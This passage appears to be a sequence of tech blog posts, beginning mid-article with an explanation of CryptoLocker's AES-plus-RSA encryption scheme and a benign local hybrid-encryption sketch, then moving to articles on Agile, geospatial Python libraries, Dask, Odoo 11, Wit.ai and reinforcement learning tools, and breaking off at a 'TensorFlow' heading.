Crypto ransomware started with simple symmetric key cryptography, but researchers could often recover these keys easily, so malware authors moved to asymmetric keys. Ransomware of the current generation uses both symmetric and asymmetric keys in a smart manner. CryptoLocker is known to use both a symmetric key and an asymmetric key. Here is the encryption process used by CryptoLocker:

- When CryptoLocker infects a machine, it connects to its C&C and requests a public key. An RSA public and private key pair is generated for that particular victim machine. The public key is sent to the victim machine, but the secret or private key is retained on the C&C server.
- The ransomware on the victim machine generates an AES symmetric key, which is used to encrypt files.
- After encrypting a file with the AES key, CryptoLocker encrypts the AES key with the RSA public key obtained from the C&C server.
- The encrypted AES key, along with the encrypted file contents, is written back to the original file in a specific format.

So, in order to get the contents back, we need to decrypt the encrypted AES key, which can only be done using the private key present on the C&C server. This makes decryption close to impossible.

Analyzing crypto ransomware

The malware analysis tools and concepts remain the same here too. Here are a few observations specific to crypto ransomware, compared to other malware:

- Crypto ransomware, when executed, usually makes a large number of file modifications. You can see the changes in the FileMon or ProcMon tools from Sysinternals.
- File extensions are changed in a lot of cases (in this particular sample, to .scl). The extension will vary with different crypto ransomware.
- A lot of the time, a file with a ransom note is present on the system. Ransom notes differ between ransomware families and can be HTML, PDF, or text files.
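Before moving on to prevention, here is a minimal, benign sketch of the hybrid AES + RSA scheme described above, using the third-party cryptography package. This is for understanding the mechanics only; in real ransomware the RSA private key never leaves the C&C server, whereas in this sketch everything stays local:

```python
# pip install cryptography
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# In the CryptoLocker scheme, this key pair is generated on the C&C server
# and only the public key ever reaches the victim machine.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# A per-victim (or per-file) symmetric key handles fast bulk encryption.
aes_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)
ciphertext = AESGCM(aes_key).encrypt(nonce, b"file contents here", None)

# The AES key itself is wrapped with the RSA public key; without the
# private key (held by the attacker), it cannot be unwrapped.
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(aes_key, oaep)

# Decryption is only possible for whoever holds the private key.
recovered_key = private_key.decrypt(wrapped_key, oaep)
plaintext = AESGCM(recovered_key).decrypt(nonce, ciphertext, None)
assert plaintext == b"file contents here"
```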
One more observation: the ransom note's filename usually contains decryption instructions, or at least points to them.

Prevention and removal techniques for crypto ransomware

In this case, prevention is better than cure, because it's hard to decrypt the encrypted files in most cases. Security vendors have come up with decryption tools to decrypt ransomware-encrypted files, but as the number of ransomware families and the complexity of their encryption algorithms increased, these decryption tools sometimes failed to cope. http://www.thewindowsclub.com/list-ransomware-decryptor-tools gives you a list of tools meant to decrypt ransomware-encrypted files. These tools may not work in all cases of ransomware encryption.

If you've enjoyed reading this post, do check out 'Preventing Ransomware' to gain end-to-end knowledge of the malware currently trending in the tech industry.

Top 5 cloud security threats to look out for in 2018
How cybersecurity can help us secure cyberspace
Cryptojacking is a growing cybersecurity threat, report warns

Abandoning Agile

Aaron Lazar
23 May 2018
7 min read
"We're Agile". That's the kind of phrase I would expect from a football team, a troupe of ballet dancers, or maybe a martial artist. Every time I hear it come from the mouth of a software professional, I go, "Oh boy, not again!". So here I am to talk about something that might touch a nerve or two of Agile fans. I'm talking about whether you should be abandoning Agile once and for all!

Okay, so what is Agile?

Agile software development is an approach to software development where requirements and solutions evolve through the collaborative effort of self-organizing, cross-functional teams, as well as the end user. Agile advocates adaptive planning, evolutionary development, early delivery, and continuous improvement. It also encourages a rapid and flexible response to change. The Agile Manifesto was created by some of the top software gurus, the likes of Uncle Bob, Martin Fowler, et al. The values that it stands for are:

- Individuals and interactions over processes and tools
- Working software over comprehensive documentation
- Customer collaboration over contract negotiation
- Responding to change over following a plan

Apart from these, it follows 12 principles, as given here, through which it aims to improve software development. At its heart, it is a mindset.

So what's wrong?

Honestly speaking, everything looks rosy from the outside until you've actually experienced it. Let me ask you at this point, and I'd love to hear your answers in the comments section below: has there never been a time when you felt at least one of the 12 principles was a hindrance to your personal, as well as your team's, development process? Well, if yes, you're not alone. But before throwing the baby out with the bathwater, let's try to understand a bit and see whether there's been some misinterpretation, which could be the actual culprit. Here are some common misinterpretations of what Agile is, and what it can and cannot do. I like to call them the 7 Deadly Sins.

#1 It changes processes

One of the main myths about Agile is that it changes processes. It doesn't really change your processes; it changes your focus. If you've been having problems with your process and you feel Agile would be your knight in shining armor, think again. You need something more than just Agile and Lean. This is one of the primary reasons teams feel that Agile isn't working for them: they've not understood whether they should have gone Agile at all. In other words, they don't know why they went Agile in the first place!

#2 Agile doesn't work for large, remote teams

The 4th principle behind the Agile Manifesto states that business people and developers must work together daily throughout the project. Have you ever thought about how "awesome aka impractical" it is to coordinate with teams in India, all the way from the US, on a daily basis? The fact is that it's not practically possible when teams are spread across time zones. What the principle intends is to have the entire team communicating with each other on a daily basis, and there's always the possibility of a single point of contact to communicate and pass on the information to other team members. So, no matter how large the team, if implemented in the right way, Agile works. Strong communication and documentation help a great deal here.

#3 Prefer the "move fast and break things" approach

Well, personally, I prefer to MFABT. Mostly because at work I'm solely responsible for my own actions. What about when you're part of a huge team that's working on something together?
When you take such an approach, there are always hidden costs of being 'wrong'. Moreover, what if every time you moved fast, all you did was break things? Do you think your team's morale would be uplifted?

#4 Sprints are counterproductive

People might argue that sprints are dumb, and ask what the point is of releasing software in bits and pieces. I think what you should actually consider is whether what you're focusing on can actually be done quicker. Faster doesn't apply to everything. Take making babies, for example. Okay, jokes apart, you'll realise you might often need to slow things down in order to go fast, so that you reach your goal without making mistakes. At least, not too many costly ones anyway. Before you dive right into Agile, understand whether it will add value to what you do.

#5 I love micromanagement

Well, too bad for you, dude. Agile actually promotes self-driven, self-managed, autonomous teams that are continuously learning to adapt and adjust. In enterprises where there is bureaucracy, it will not work. Bear in mind that most organizations (maybe apart from startups) are hierarchical in nature, which brings with it bureaucracy in some form or flavor.

#6 Scrum saves time

Well, yes, it does. Although if you're a manager and think Scrum is going to save you a couple of hours otherwise spent paying attention to your individual team members, you're wrong. The idea of Scrum is to identify where you've reached, what you need to do today, and whether there's anything that might get in the way of that. Scrum is no substitute for knowing your team members' problems and helping them overcome them.

#7 Test everything, every time

No, no, no, no. That's a wrong notion, and one which in fact wastes a lot of time. What you should actually be doing is automated regression tests. No testing is bad too; you surely don't want bad surprises before you release!

Teams and organisations tend to get carried away by the Agile movement and try to imitate others without understanding whether what they're doing is actually in line with what the business needs. Now, back to what I said at the beginning: when teams say they're Agile, half of them only think they are. Agile was built for the benefit of software teams all across the globe and, from what teams say, it does work wonders! Like any long-term relationship, it takes conscious effort and time every day to make it work.

Should you abandon Agile?

Yes and no. If you have the slightest hint that one or more of the following are true for your organisation, you really need to abandon Agile, or it will backfire:

- Your team is not self-managed and lacks mature, cross-functional developers
- Your customers need you to take approvals at every release stage
- Not everyone in your organisation believes in Agile
- Your projects are not too complex

Always remember, Agile is not a tool, and if someone is trying to sell you a tool to help you become Agile, they're looting you. It is a mindset; a family that trusts each other, and a team that communicates effectively to get things done. My suggestion is to go ahead and become Agile, but only if the whole family is for it and is willing to transform together. In other words, Agile is not a panacea for all development projects. Your choice of methodology will come down to what makes the best sense for your project, your team, and your organization. Don't be afraid to abandon Agile in favor of newer approaches such as Chaos Engineering and mob programming, or even to go back to the good ol' waterfall model.
Let us know what you think of Agile and how well your organisation has adapted to it, if it has adopted it. You can look up some fun discussions about whether it works or sucks on Hacker News:

In a nutshell, why do a lot of developers dislike Agile?
Poor Man's Agile: Scrum in 5 Simple Steps
What is Mob Programming?
5 things that will matter in application development in 2018
Chaos Engineering: managing complexity by breaking things

Top 7 libraries for geospatial analysis

Aarthi Kumaraswamy
22 May 2018
12 min read
The term geospatial refers to information that is tied to locations on the earth's surface. This can include, for example, the position of a cellphone tower, the shape of a road, or the outline of a country. Geospatial data often associates some piece of information with a particular location. Geospatial development is the process of writing computer programs that can access, manipulate, and display this type of information.

Internally, geospatial data is represented as a series of coordinates, often in the form of latitude and longitude values. Additional attributes, such as temperature, soil type, height, or the name of a landmark, are also often present. There can be many thousands (or even millions) of data points for a single set of geospatial data. In addition to the prosaic tasks of importing geospatial data from various external file formats and translating data from one projection to another, geospatial data can also be manipulated to solve various interesting problems. Obvious examples include calculating the distance between two points, calculating the length of a road, or finding all data points within a given radius of a selected point. We use libraries to solve all of these problems and more. Today we will look at the major libraries used to process and analyze geospatial data:

- GDAL/OGR
- GEOS
- Shapely
- Fiona
- Python Shapefile Library (pyshp)
- pyproj
- Rasterio
- GeoPandas

This is an excerpt from the book, Mastering Geospatial Analysis with Python by Paul Crickard, Eric van Rees, and Silas Toms.

Geospatial Data Abstraction Library (GDAL) and the OGR Simple Features Library

The Geospatial Data Abstraction Library (GDAL)/OGR Simple Features Library combines two separate libraries that are generally downloaded together as GDAL, which means that installing the GDAL package also gives access to OGR functionality. The reason GDAL is covered first is that the other packages were written after GDAL, so, chronologically, it comes first. As you will notice, some of the packages covered in this post extend GDAL's functionality or use it under the hood.

GDAL was created in the 1990s by Frank Warmerdam and saw its first release in June 2000. Later, the development of GDAL was transferred to the Open Source Geospatial Foundation (OSGeo). Technically, GDAL is a little different from your average Python package, as the GDAL package itself was written in C and C++, meaning that in order to use it in Python, you need to compile GDAL and its associated Python bindings. However, using conda and Anaconda makes it relatively easy to get started quickly. Because it was written in C and C++, the online GDAL documentation is written for the C++ version of the libraries. For Python developers, this can be challenging, but many functions are documented and can be consulted with the built-in pydoc utility, or by using the help function within Python. Because of its history, working with GDAL in Python also feels a lot like working in C++ rather than pure Python. For example, the naming convention in OGR differs from Python's, with uppercase rather than lowercase used for functions. These differences explain the choice for some of the other Python libraries, such as Rasterio and Shapely, which are also covered here; they have been written from a Python developer's perspective while offering the same functionality as GDAL. GDAL is a massive and widely used data library for raster data.
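As a quick taste of the API, here is a minimal sketch of opening a raster with GDAL's Python bindings (example.tif is a hypothetical file used only for illustration):

```python
from osgeo import gdal

dataset = gdal.Open("example.tif")   # hypothetical raster file; returns None if missing
print(dataset.RasterXSize, dataset.RasterYSize, dataset.RasterCount)

band = dataset.GetRasterBand(1)      # bands are 1-indexed in GDAL
pixels = band.ReadAsArray()          # raster contents as a NumPy array
print(pixels.mean())
```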
GDAL supports the reading and writing of many raster file formats, with the latest version supporting up to 200 different file formats. Because of this, it is indispensable for geospatial data management and analysis. Used together with other Python libraries, GDAL enables some powerful remote sensing functionality. It's also an industry standard and is present in commercial and open source GIS software.

The OGR library is used to read and write vector-format geospatial data, supporting many different formats; OGR uses a consistent model to be able to manage them all. You can use OGR to do vector reprojection, vector data format conversion, vector attribute data filtering, and more. The GDAL/OGR libraries are not only useful for Python programmers but are also used by many GIS vendors and open source projects. The latest GDAL version at the time of writing is 2.2.4, which was released in March 2018.

GEOS

The Geometry Engine Open Source (GEOS) is the C/C++ port of a subset of the Java Topology Suite (JTS) and selected functions. GEOS aims to contain the complete functionality of JTS in C++. It can be compiled on many platforms, including Python. As you will see later on, the Shapely library uses functions from the GEOS library. In fact, there are many applications using GEOS, including PostGIS and QGIS. GeoDjango also uses GEOS, as well as GDAL, among other geospatial libraries. GEOS can also be compiled with GDAL, giving OGR all of its capabilities. The JTS is an open source geospatial computational geometry library written in Java. It provides various functionality, including a geometry model, geometric functions, spatial structures and algorithms, and I/O capabilities. Using GEOS, you have access to the following capabilities: geospatial functions (such as within and contains), geospatial operations (union, intersection, and many more), spatial indexing, Open Geospatial Consortium (OGC) well-known text (WKT) and well-known binary (WKB) input/output, the C and C++ APIs, and thread safety.

Shapely

Shapely is a Python package for the manipulation and analysis of planar features, using functions from the GEOS library (the engine of PostGIS) and a port of the JTS. Shapely is not concerned with data formats or coordinate systems, but can be readily integrated with packages that are. Shapely only deals with analyzing geometries and offers no capabilities for reading and writing geospatial files. It was developed by Sean Gillies, who was also the person behind Fiona and Rasterio.

Shapely supports eight fundamental geometry types that are implemented as classes in the shapely.geometry module: points, multipoints, linestrings, multilinestrings, linearrings, polygons, multipolygons, and geometrycollections. Apart from representing these geometries, Shapely can be used to manipulate and analyze them through a number of methods and attributes. Shapely has mainly the same classes and functions as OGR for dealing with geometries. The difference is that Shapely has a more Pythonic and very intuitive interface, is better optimized, and has well-developed documentation. With Shapely, you're writing pure Python, whereas with GEOS, you're writing C++ in Python. For data munging, a term used for data management and analysis, you're better off writing in pure Python rather than C++, which explains why these libraries were created. For more information on Shapely, consult the documentation.
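Here is a minimal sketch of the Shapely interface described above (the coordinates are arbitrary):

```python
from shapely.geometry import Point, Polygon

home = Point(2.0, 3.0)
park = Polygon([(0, 0), (0, 5), (5, 5), (5, 0)])

print(park.contains(home))       # True: the point lies inside the polygon
print(park.area, park.centroid)  # derived attributes of the geometry

# Geometric operations compose naturally: buffer the point by 1 unit,
# then measure how much of that disc overlaps the polygon.
print(home.buffer(1.0).intersection(park).area)
```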
The Shapely documentation also has detailed information on installing Shapely for different platforms, and on how to build Shapely from source for compatibility with other modules that depend on GEOS. This refers to the fact that installing Shapely may require you to upgrade NumPy and GEOS if these are already installed.

Fiona

Fiona is a Python API built on OGR. It can be used for reading and writing data formats. The main reason for using it instead of OGR is that it's closer to Python, as well as more dependable and less error-prone. It makes use of two well-known formats, WKT and WKB, for representing spatial information in vector data. As such, it combines well with other Python libraries such as Shapely: you would use Fiona for input and output, and Shapely for creating and manipulating the geospatial data. While Fiona is Python compatible and our recommendation, users should also be aware of some of the disadvantages. It is more dependable than OGR because it uses Python objects for copying vector data instead of C pointers, but this also means that it uses more memory, which affects performance.

Python Shapefile Library (pyshp)

The Python Shapefile Library (pyshp) is a pure Python library used to read and write shapefiles. The pyshp library's sole purpose is to work with shapefiles, and it only uses the Python standard library. You cannot use it for geometric operations. If you're only working with shapefiles, this one-file-only library is simpler than using GDAL.

pyproj

pyproj is a Python package that performs cartographic transformations and geodetic computations. It is a Cython wrapper providing Python interfaces to PROJ.4 functions, meaning you can access an existing library of C code from Python. PROJ.4 is a projection library that transforms data among many coordinate systems and is also available through GDAL and OGR. The reason that PROJ.4 is still popular and widely used is two-fold:

- Firstly, because it supports so many different coordinate systems
- Secondly, because of the routes it provides to do this: Rasterio and GeoPandas, two Python libraries covered next, both use pyproj and thus PROJ.4 functionality under the hood

The difference between using PROJ.4 separately rather than through a package such as GDAL is that it enables you to re-project individual points; packages using PROJ.4 do not offer this functionality. The pyproj package offers two classes: the Proj class, which performs cartographic computations, and the Geod class, which performs geodetic computations.

Rasterio

Rasterio is a GDAL- and NumPy-based Python library for raster data, written with the Python developer in mind rather than the C developer, using Python types, protocols, and idioms. Rasterio aims to make GIS data more accessible to Python programmers and helps GIS analysts learn important Python standards. Rasterio relies on concepts of Python rather than GIS.

Rasterio is an open source project from the satellite team of Mapbox, a provider of custom online maps for websites and applications. The name of this library should be pronounced raster-i-o rather than ras-te-rio. Rasterio came into being as a result of a project called the Mapbox Cloudless Atlas, which aimed to create a pretty-looking basemap from satellite imagery. One of the software requirements was to use open source software and a high-level language with handy multi-dimensional array syntax. Although GDAL offers proven algorithms and drivers, developing with GDAL's Python bindings feels a lot like C++.
Therefore, Rasterio was designed to be a Python package at the top, with extension modules (using Cython) in the middle, and a GDAL shared library at the bottom. Other requirements for the raster library were being able to read and write NumPy ndarrays to and from data files, and using Python types, protocols, and idioms instead of C or C++, to free programmers from having to code in two languages. For georeferencing, Rasterio follows the lead of pyproj. There are a couple of capabilities added on top of reading and writing, one of them being a features module. Reprojection of geospatial data can be done with the rasterio.warp module. Rasterio's project homepage can be found on GitHub.

GeoPandas

GeoPandas is a Python library for working with vector data. It is based on the pandas library, which is part of the SciPy stack. SciPy is a popular library for data inspection and analysis, but unfortunately, it cannot read spatial data. GeoPandas was created to fill this gap, taking pandas data objects as a starting point. The library also adds functionality from geographical Python packages.

GeoPandas offers two data objects: a GeoSeries object that is based on a pandas Series object, and a GeoDataFrame that is based on a pandas DataFrame object but adds a geometry column for each row. Both GeoSeries and GeoDataFrame objects can be used for spatial data processing, similar to spatial databases. Read and write functionality is provided for almost every vector data format. Also, because both Series and DataFrame objects are subclasses of pandas data objects, you can use the same properties to select or subset data, for example .loc or .iloc. GeoPandas is a library that employs the capabilities of newer tools, such as Jupyter Notebooks, pretty well, whereas GDAL enables you to interact with data records inside vector and raster datasets through Python code. GeoPandas takes a more visual approach by loading all records into a GeoDataFrame so that you can see them all together on your screen. The same goes for plotting data. These functionalities were lacking in Python 2, as developers were dependent on IDEs without the extensive data visualization capabilities that are now available with Jupyter Notebooks.

We've provided an overview of the most important open source packages for processing and analyzing geospatial data. The question then becomes when to use a certain package and why. GDAL, OGR, and GEOS are indispensable for geospatial processing and analysis, but they were not written in Python, so they require Python bindings for Python developers. Fiona, Shapely, and pyproj were written to solve these problems, as was the newer Rasterio library. For a more Pythonic approach, these newer packages are preferable to the older C++ packages with Python bindings (although the latter are still used under the hood). Now that you have an idea of what options are available for a certain use case and why one package is preferable over another, here's something you should always remember: as is often the way in programming, there might be multiple solutions for one particular problem. For example, when dealing with shapefiles, you could use pyshp, GDAL, Shapely, or GeoPandas, depending on your preference and the problem at hand.

Introduction to Data Analysis and Libraries
15 Useful Python Libraries to make your Data Science tasks Easier
"Pandas is an effective tool to explore and analyze data": An interview with Theodore Petrou
Using R to implement Kriging: A Spatial Interpolation technique for Geostatistics data

Introducing Dask: The library that makes scalable analytics in Python easier

Amey Varangaonkar
22 May 2018
6 min read
Python's rise as the language of choice in data science is unprecedented, but not really unexpected. Apart from being a general-purpose language that can be used for a variety of tasks, from scripting to networking, Python offers a rich suite of libraries for general data science tasks such as scientific computing, data visualization, and more. However, one big challenge faced by data scientists is that these packages are not designed for scale. This is crucial in today's Big Data era, where tons of data need to be processed and analyzed on the go. A platform that supports the existing Python ecosystem and allows it to scale across multiple machines and clusters without affecting performance was conspicuously missing. Enter Dask.

What is Dask?

Dask is a flexible parallel computing library written in Python for analytics, designed mainly to offer scalability and enhanced power to existing packages and libraries. It allows users to scale existing Python-based projects written with popular libraries such as NumPy, SciPy, and pandas. (An architecture diagram, courtesy of Slideshare, accompanied the original article.) The two key components of Dask that interact with the Python libraries are:

- Dynamic task schedulers, which take care of the intensive computational workloads
- "Big Data" Dask collections, consisting of dataframes, parallel arrays, and interfaces that allow the computations to run on distributed environments

Why use Dask?

Given that there are already quite a few distributed platforms for large-scale data processing, such as Apache Spark, Apache Storm, and Flink, why and when should one go for Dask? What advantages does this Python library offer? Let us take a look at the four major reasons to prefer Dask for distributed, scalable analytics in Python:

Easy to get started: If you are an existing Python user, you must have already worked with popular Python packages such as NumPy, SciPy, matplotlib, scikit-learn, and pandas. Dask offers a similar, intuitive interface and, since it is a part of the bigger Python ecosystem, getting started with Dask is very easy. It uses the existing Python APIs to switch between popular packages and their Dask equivalents, so you don't have to spend a lot of time porting code. For absolute beginners, using Dask for scalable analytics is an easier and more logical option to pursue once they have grasped the fundamentals of Python and the associated libraries.

Scales up and down quite easily: You can run your project on Dask on a single machine, or on a cluster with thousands of cores, without essentially affecting the speed and performance of your code. Dask uses the multiple CPU cores within a single system optimally to process hundreds of terabytes of data without the need for additional hardware. Similarly, for moderate to large datasets spanning 100+ gigabytes, which often don't fit into a single storage device, the computing power of clusters can be coupled with Dask for effective analytics.

Supports complex applications: Many companies tend to tackle complex computations by introducing custom code that runs on popular Big Data tools such as Hadoop MapReduce and Apache Spark. However, with the help of Dask's dynamic task scheduling, it is now possible to run and process complex applications without introducing any additional code.
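As a minimal sketch of this dynamic task scheduling, here is Dask's delayed interface in action; the functions below are made-up placeholders standing in for real work:

```python
import dask

# Each decorated call builds a node in a task graph instead of running
# eagerly; Dask's scheduler later executes the graph, in parallel where possible.
@dask.delayed
def load(part):
    return list(range(part * 1000, (part + 1) * 1000))

@dask.delayed
def clean(rows):
    return [r for r in rows if r % 2 == 0]

@dask.delayed
def total(groups):
    return sum(sum(g) for g in groups)

# Four independent load->clean branches feed one aggregation node.
result = total([clean(load(p)) for p in range(4)])
print(result.compute())  # compute() triggers the actual parallel execution
```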
How Dask compares with Apache Spark

Apache Spark is one of the most popular and widely used Big Data tools for distributed data processing and analytics. Dask and Apache Spark have many features in common, prompting us and many other developers to ask the question: which tool is better? While Spark has been around for quite some time and has accumulated many standard, stable features over years of development, Dask is quite new and is still being improved as a tool. We summarize the important differences between Dask and Apache Spark in the table below:

Criteria          | Apache Spark                                                 | Dask
Primary language  | Scala                                                        | Python
Scale             | Supports a single node to thousands of nodes in the cluster  | Supports a single node to thousands of nodes in the cluster
Ecosystem         | All-in-one self-sufficient ecosystem                         | Integration with popular libraries within the Python ecosystem
Flexibility       | Low                                                          | High
Stream processing | Built-in module called Spark Streaming                       | Real-time interface which is pretty low-level and requires more work than Apache Spark
Graph processing  | Possible with the GraphX module                              | Not possible
Machine learning  | Uses the Spark MLlib module                                  | Integrates with scikit-learn and XGBoost
Popularity        | Very high; a commonly used tool in the Big Data ecosystem    | Fairly new, but has already found its place in the pandas, scikit-learn and Jupyter stack

You can read a detailed comparison of Apache Spark and Dask on the official Dask documentation page.

What we can expect from Dask

As we saw from the comparison above, it is fairly easy to port an existing Python project that uses high-profile libraries such as NumPy, scikit-learn and more. Python developers and data scientists will appreciate the high flexibility and complex computational capabilities offered by Dask. The limited stream processing and graph processing features are big areas for improvement, but we can expect developments in this domain in the near future. Even though Dask is still relatively new, it looks very promising due to its close affinity with the Python ecosystem. With Python’s clout rising, many people would prefer a Python-based data processing tool that works at scale, without having to switch to an external Big Data framework. Dask may well be the superhero that comes to developers’ rescue in such cases. You can learn more about the latest developments in Dask on its official GitHub page.

Read more:
- Is Apache Spark today’s Hadoop?
- Apache Spark 2.3 now has native Kubernetes support!
- Should you move to Python 3? 7 Python experts’ opinions


ERP tool in focus: Odoo 11

Sugandha Lahoti
22 May 2018
3 min read
What is Odoo?

Odoo is an all-in-one management software that offers a range of business applications, forming a complete suite of enterprise management applications targeting companies of all sizes. It is versatile in the sense that it can be used across multiple categories, including CRM, website, e-commerce, billing, accounting, manufacturing, warehouse and project management, and inventory. The community version is free of charge and can be installed with ease. Odoo is one of the fastest-growing open source business application development products available. With the announcement of version 11, many new features have been added to Odoo and the face of business application development with Odoo has changed. In Odoo 11, the online installation documentation continues to improve, and there are now options for Docker installations. In addition, Odoo 11 uses Python 3 instead of Python 2.7. This will not change the steps you take to install Odoo, but it will change the specific libraries that get installed. While much of the process is the same as in previous versions of Odoo, there have been some pricing changes in Odoo 11. There are only two free users now, and you pay for additional users. There is one free application that you can install for an unlimited number of users, but as soon as you have more than one application, you must pay $25 for each user, including the first. If you have thought about developing in Odoo, now is the best time to start. Before I convince you of why Odoo is great, let’s take a step back and revisit our fundamentals.

What is an ERP?

ERP is an acronym for Enterprise Resource Planning. An ERP gives a global, real-time view of data that enables companies to address concerns and drive improvements. It automates core business operations such as the order-to-fulfillment and procure-to-pay processes. It also reduces risk for companies and enhances customer service by providing a single source for billing and relationship tracking.

Why Odoo?

- Extensible and easy to customize: Odoo’s framework was built with extensibility in mind. Extensions and modifications can be implemented as modules, applied over the module whose feature is being changed without actually changing it. This keeps customized applications clean and easy to control (see the minimal module sketch after this list).
- You get integrated information: Instead of distributing data throughout several separate databases, Odoo maintains a single location for all the data. Moreover, the data remains consistent and up to date.
- Single reporting system: Odoo has a unified, single reporting system to analyze and track status. Users can also run their own reports without any help from IT. A single reporting system, such as the one provided by Odoo ERP software, helps make reporting easier and more customizable.
- Built around Python: Odoo is built using the Python programming language, one of the most popular languages among developers.
- Large community: The capability to combine several modules into feature-rich applications, along with the open source nature of Odoo, is probably the most important factor explaining the community that has grown around Odoo. In fact, there are thousands of community modules available for Odoo, covering virtually every topic, and the number of people getting involved has been growing steadily every year.
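As a taste of that extensibility, here is a minimal sketch of what a model in an Odoo 11 addon can look like. The model and field names are hypothetical; a real module would also need a `__manifest__.py` descriptor, and the file is loaded by the Odoo server as part of an addon rather than run directly.

```python
# A minimal sketch of an Odoo 11 addon model (models/library_book.py).
# The 'library.book' model and its fields are illustrative only.
from odoo import models, fields


class LibraryBook(models.Model):
    _name = 'library.book'          # hypothetical technical model name
    _description = 'Library Book'

    name = fields.Char('Title', required=True)
    date_release = fields.Date('Release Date')
    active = fields.Boolean('Active', default=True)
```

Because the class is just a module, another addon can inherit `library.book` and add or override fields without touching this code, which is the customization mechanism described above.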
Go through our video, Odoo 11 Development Essentials, to learn how to scaffold a new module, create new models, and use the functions that make Odoo 11 one of the best ERPs out there.

Read more:
- Top 5 free Business Intelligence tools
- How to build a live interactive visual dashboard in Power BI with Azure Stream
- Tableau 2018.1 brings new features to help organizations easily scale analytics

Facebook’s Wit.ai: Why we need yet another chatbot development framework?

Sunith Shetty
21 May 2018
4 min read
Chatbots are remarkably changing the way customer service is provided across a variety of industries. Customer satisfaction plays a very important role for every organization, and customers expect businesses to be reachable at any time and to respond to their queries 24x7. With growing artificial intelligence advances in smart devices and IoT, chatbots are becoming a necessity for communicating with customers in real time. There are many existing vendors, such as Google, Microsoft, Amazon and IBM, with the models and services required to build conversational interfaces for applications and devices. But the chatbot industry is still evolving, and even minor improvements in the UI, in the algorithms that work behind the scenes, or in the data used for training can mean a major win. With complete backing from the Facebook team, we can expect Wit.ai to create new, simplified ways to ease speech recognition and voice interfaces for developers. Wit.ai has excellent support for NLP, making it one of the popular bot frameworks on the market. The key to chatbot success is continuous learning that enables bots to leverage relevant data in order to connect with clearly defined customers; this is what makes Wit.ai extra special.

What is Wit.ai?

Wit.ai is an open and extensible NLP engine for developers, acquired by Facebook, which allows you to build conversational applications and devices that you can talk or text to. It provides an easy interface and quick-learning APIs that understand human communication from every interaction and help parse a complex message (voice or text) into structured data, as the sketch below shows. It also helps you predict forthcoming events based on what it learns from the gathered data.

Why Wit.ai?

- It is one of the most powerful APIs for understanding natural language.
- It is a free SaaS platform that provides services for developers to build a chatbot for their app or device.
- It has story support, allowing you to visualize the user experience.
- A built-in NLP integration with the Facebook Page inbox allows page admins to create a Wit app with ease. Further, by using anonymized samples from past messages, the bot can automate responses to the most common requests.
- You can create efficient and powerful text- or voice-based conversational bots that humans can chat with. In addition to business bots, these APIs can be used to build hands-free voice interfaces for mobile phones, wearable devices, home automation products and more.
- It can be used in platforms that learn new commands semantically similar to those input by the developer.
- It provides a developer GUI, which includes a visual representation of the conversation flows, business logic invocations, context variables, jumps, and branching logic.
- Programming language and integration support: Node.js client, Python client, Ruby client, and an HTTP API.

Challenges in Wit.ai

- Wit.ai doesn’t support third-party integration tools.
- Wit.ai has no required slot/parameter feature, so you have to invoke business logic at every user interaction in order to gather any missing information the user did not provide.
- Training the engine can take some time, depending on the task performed.
- As the number of stories increases, the Wit engine becomes slower.

However, existing Wit.ai adoption looks very promising, with more than 160,000 members in the community contributing on GitHub.
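As a quick illustration of the structured-data parsing described above, here is a minimal sketch using pywit, the Python client mentioned in the support list. The access token and the utterance are placeholders, and the exact entities returned depend on how your Wit.ai app is trained.

```python
# A minimal sketch of parsing one text utterance with the Wit.ai
# Python client (pip install wit). Token and message are placeholders.
from wit import Wit

client = Wit(access_token="YOUR_SERVER_ACCESS_TOKEN")

# The /message endpoint turns a raw utterance into structured data
resp = client.message("Book a table for two at 8pm")
print(resp)  # a dict with the detected intents/entities for the message
```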
For complete coverage of tutorials, documentation and client APIs, you can visit the Wit.ai GitHub page to see a list of repositories.

Read more:
- My friend, the robot: Artificial Intelligence needs Emotional Intelligence
- Snips open sources Snips NLU, its Natural Language Understanding engine
- What can Google Duplex do for businesses?


Top 5 tools for reinforcement learning

Pravin Dhandre
21 May 2018
4 min read
After deep learning, reinforcement learning (RL) is the hottest branch of artificial intelligence, and it is finding speedy adoption in tech-driven companies. Simply put, reinforcement learning is all about algorithms that track previous actions or behaviour and arrive at optimized decisions using the trial-and-error principle. Read How Reinforcement Learning works to know more. It might sound theoretical, but giant firms like Google and Uber have tested out this mechanism and have been highly successful in cutting-edge applied robotics fields such as self-driving vehicles. Other top players, including Amazon, Facebook and Microsoft, have centered their innovations around deep reinforcement learning across automotive, supply chain, networking, finance and robotics. With such achievements, reinforcement learning libraries have caught the eye of the AI developer community and gained prime interest for training agents and reinforcing their behavior. In fact, researchers believe in the tremendous potential of reinforcement learning to address unsolved real-world challenges like material discovery, space exploration and drug discovery, and to build much smarter artificial intelligence solutions. In this article, we will have a look at the most promising open source tools and libraries to start building your reinforcement learning projects on.

OpenAI Gym

OpenAI Gym, the most popular environment for developing and comparing reinforcement learning models, is completely compatible with high-performance computational libraries like TensorFlow. The Python-based simulation environment offers support for training agents on classic games like Atari, as well as on other branches of science like robotics and physics through simulators such as Gazebo and MuJoCo. The Gym environment also offers APIs that facilitate feeding observations, along with rewards, back to agents, as the sketch below shows. OpenAI has also recently released a new platform, Gym Retro, made up of 58 varied and specific scenarios from the Sonic the Hedgehog, Sonic the Hedgehog 2, and Sonic 3 games. Reinforcement learning enthusiasts and AI game developers can register for this competition. Read: How to build a cartpole game using OpenAI Gym
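Here is a minimal sketch of that observation/reward loop on the classic CartPole task, assuming the gym package as it existed around the time of writing (where step() returns four values); the random agent is just a stand-in for a real policy.

```python
# A minimal sketch of the Gym observation/reward loop (pip install gym).
import gym

env = gym.make("CartPole-v1")
observation = env.reset()

for _ in range(1000):
    action = env.action_space.sample()                 # a random agent
    observation, reward, done, info = env.step(action)  # feed action, get feedback
    if done:                                           # episode over: pole fell
        observation = env.reset()

env.close()
```

Every Gym environment exposes the same reset()/step() interface, which is what makes it easy to compare agents across tasks.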
TensorFlow

